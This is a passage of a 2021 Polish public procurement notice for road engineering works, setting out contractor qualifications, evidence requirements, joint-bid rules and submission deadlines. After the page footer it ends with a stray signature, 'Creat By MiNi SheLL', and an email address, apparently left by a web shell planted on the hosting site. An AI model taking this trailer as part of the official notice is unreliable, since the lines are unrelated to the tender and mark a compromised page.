„kierowniku budowy”, „kierownikurobót” należy pojęcia te rozumieć zgodnie z definicjami określonymi w ustawie Prawo budowlaneoraz aktami wykonawczymi do niej.Wartości podane w dokumentach potwierdzającychspełnienie warunku w walutach innych niż wskazane przez Zamawiającego należy przeliczyćwedług średniego kursu NBP na dzień zawarcia Umowy/-ów na realizację roboty/robótwykazanej/wykazanych w ramach powyżej określonego warunku.Za drogowe obiektyinżynierskie Zamawiający uzna obiekty inżynierskie w rozumieniu rozporządzenia MinistraTransportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków technicznych,jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie (Dz. U. z 2000 nr 63poz. 735 ze zm.).Dodatkowe informacje: - przez „uprawnienia budowlane” zamawiający rozumieuprawnienia budowlane, o których mowa w ustawie Prawo budowlane oraz w RozporządzeniuMinistra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcjitechnicznych w budownictwie (Dz. U. z 2014 r., poz. 1278 ze zm.) lub odpowiadające im ważneuprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa lubodpowiednich przepisów obowiązujących na terenie kraju, w którym wykonawca ma siedzibę lubmiejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskichUnii Europejskiej (Dz. U. z 2016 r., poz. 65 ze zm.). - Zamawiający na etapie składania i ocenyofert nie wymaga, aby osoby posiadające uprawnienia budowlane, a będące obywatelamipaństw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskichEuropejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim ObszarzeGospodarczym, poza legitymowaniem się posiadaniem uprawnień budowlanych zdobytych pozaterytorium Polski, musiały dysponować odpowiednią decyzją o uznaniu kwalifikacji zawodowychlub w lub w przypadku braku decyzji o uznaniu kwalifikacji zawodowych, by spełniły wymagania,o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządachzawodowych architektów oraz inżynierów budownictwa (t.j.: Dz. U. z 2016 r., poz. 1725 ze zm.),dotyczące świadczenia usług transgranicznych, tj. aby uzyskały one tymczasowy wpis na listęczłonków właściwej izby samorządu zawodowego. - na podstawie art. 104 ustawy Prawobudowlane osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcjitechnicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji wdotychczasowym zakresie. - zakres uprawnień budowlanych należy odczytywać zgodnie ztreścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. W celuuniknięcia wątpliwości zaleca się podanie daty wydania uprawnień i dokładne cytowanie zakresuuprawnień z posiadanego zaświadczenia. - wszystkie osoby przewidziane do realizacjizamówienia muszą biegle posługiwać się językiem polskim. W przeciwnym wypadkuwykonawca udostępni wystarczającą ilość tłumaczy, wykazujących znajomość językatechnicznego w zakresie terminologii budowlanej, we wszystkich specjalnościach występującychprzy realizacji zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp p i pkt 10.2 IDW.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okresprowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty imiejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniemdowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, októrych mowa, są referencje bądź inne dokumenty sporządzoneprzez podmiot, na rzecz którego robotybudowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanieuzyskać tych dokumentów - inne odpowiednie dokumenty. Okres 5 lat, o którym mowa powyżej, liczysię wstecz od dnia w którym upływa termin składania ofert.b) wykaz osób, skierowanych przezWykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenieusług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ichkwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonaniazamówienia publicznego, a także zakresu wykonywanych przez nieczynności oraz informacją opodstawie do dysponowania tymi osobami.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadkuWykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzieleniezamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego. 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, oraz wprzypadkach, o których mowa w pkt 9.2. IDW, natomiast spełnianie warunków udziału wpostępowaniu Wykonawcy wykazują zgodnie z pkt 8.2. IDW. 3. W przypadku wspólnegoubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 10.2IDW, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia tepotwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniuwzakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału wpostępowaniu. 4. W przypadku, gdy spełnienie warunku opisanego: 1) w pkt. 8.2.4) IDWwykazuje co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 2) w pkt. 8.2.4) IDW Wykonawcy wykazują poprzez poleganie na zdolnościach tych zWykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności sąwymagane. -Wykonawcy wspólnie ubiegający się o udzielenie zamówienia oświadczają, któreroboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.5. W przypadkuwspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanieZamawiającego złożyć aktualne na dzień złożenia podmiotowe środki dowodowe, o którychmowa w pkt 10 IDW, przy czym: 1) podmiotowe środki dowodowe, o których mowa w pkt 10.8.IDW, składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnianie warunku,w zakresie i na zasadach opisanych w pkt 8.2 IDW; 2) oświadczenie, o którym mowa w pkt 10.7.IDW, składa każdy z nich. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres i charakter zmian oraz warunki wprowadzenia zmian zostały określone w PPU (Tom II SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-01 10:50</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty powinny by złożone za pośrednictwem Platformy zakupowej https:// gddkia.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-01 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga, aby przedmiot zamówienia (dla części 1 i 2) został zrealizowany wterminie: 5 miesięcy od dnia podpisania umowy, przy czym minimalny termin realizacjidopuszczony przez Zamawiającego, który może zaoferować Wykonawca to 4 miesiące. Terminrealizacji stanowi kryterium oceny ofert.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-14 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com